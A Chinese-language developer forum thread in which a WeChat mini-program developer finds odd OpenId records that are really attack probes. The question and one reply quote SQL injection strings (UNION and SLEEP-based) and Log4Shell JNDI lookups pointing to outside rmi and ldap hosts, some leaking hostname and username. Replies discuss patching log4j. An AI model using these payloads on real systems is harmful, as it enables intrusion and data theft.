收藏
回答

微信小程序获取用户信息时,OpenId出现乱码,一个用户插入了N条信息

出现很多下面的乱码

oPt8w5a7jrXzDoGVQVENoo5GInk4

opt8w5a7jrxzdogvqvenoo5gink4' union 1-- 

opt8w5a7jrxzdogvqvenoo5gink4' union 1,2-- 

 AND (SELECT*FROM(SELECT(SLEEP(3)))dovm) limi

${jndi:rmi://9.4.131.68:1099/bypass7d616399cd

${jndi:rmi://101.91.62.170:1099/bypass24039a6

${jndi:ldap://hostname-${hostName}.username-$

${jndi:ldap://101.91.62.170:1389/jdk1889905e3

${jndi:ldap://9.4.131.68:1389/jdk18ded425cbb6

最后一次编辑于  2022-01-24
回答关注问题邀请回答
收藏

7 个回答

  • 肖彪
    肖彪
    08-05

    这个是微信安全团队的测试

    $_GET = [

        'select' => '${jndi:ldap://183.47.120.213:1389/jdk18fdafcc6c9d4e2565049a58624811fb03-/-${hostName}}'

    ]

    $_SERVER = [

        'HTTP_USER_AGENT' => 'Tencent Security Team, more information: https://developers.weixin.qq.com/community/minihome/doc/0008ea401c89c02cff2d1345051001 (66a840605d716bd8fc227a37a4db) f6a6'

    08-05
    有用
    回复
  • 阿木木木丶
    阿木木木丶
    2022-07-29

    我也出现过好几次,9.4.131.68我查IP还是美国的,一开始没有在意,我觉得是我代码的bug就不停删,后来数据测试没问题,增删改查也没有出现这一堆sql代码的数据,直到我发现了这个IP。。。

    2022-07-29
    有用
    回复 3
    • 阿木木木丶
      阿木木木丶
      2022-07-29
      是不是微信接口被攻击了或者有bug呢?
      2022-07-29
      回复
    • 口丁乙
      口丁乙
      2023-06-28
      解决了吗
      2023-06-28
      回复
    • bleem
      bleem
      2023-08-07
      解决了吗
      2023-08-07
      回复
  • 小米奥奥
    小米奥奥
    2022-06-24

    请问一下,这种攻击会影响数据库吗,为什么会出现这种攻击嘞。。。

    2022-06-24
    有用
    回复
  • 彭宗阁
    彭宗阁
    2022-04-12

    你解决了吗 还攻击吗 我的也是这两个ip 进行了好向天的攻击 想利用 log4j的漏洞 需要把 log4j的漏洞给修复 我的修复完之后 刚上来一个劲攻击 后来就没有再攻击了

    2022-04-12
    有用
    回复 2
    • 不吃苹果🍎
      不吃苹果🍎
      2022-04-25
      我今天也收到这个攻击了,能知道这是准备干什么么?
      2022-04-25
      回复
    • 5A56我的物流
      5A56我的物流
      2022-05-15
      这种攻击可以报警吗?
      2022-05-15
      回复
  • 志雄🐼
    志雄🐼
    2022-03-19

    攻击而已

    2022-03-19
    有用
    回复
  • 晓滨
    晓滨
    2022-03-04

    请问知道是什么原因吗

    2022-03-04
    有用
    回复
  • Mr.Zhao
    Mr.Zhao
    2022-01-24

    这不是乱码,sql报错了吧

    2022-01-24
    有用
    回复 3
    • 周董
      周董
      2022-01-24
      没报错,之前重来没出现过;同一个会员插入了20几条。
      2022-01-24
      回复
    • Mr.Zhao
      Mr.Zhao
      2022-01-24回复周董
      从哪能看出来是获取用户信息?代码在你手里啊,好难猜
      2022-01-24
      回复
    • Gentle
      Gentle
      2022-11-24回复Mr.Zhao
      ,,,,
      2022-11-24
      回复
登录 后发表内容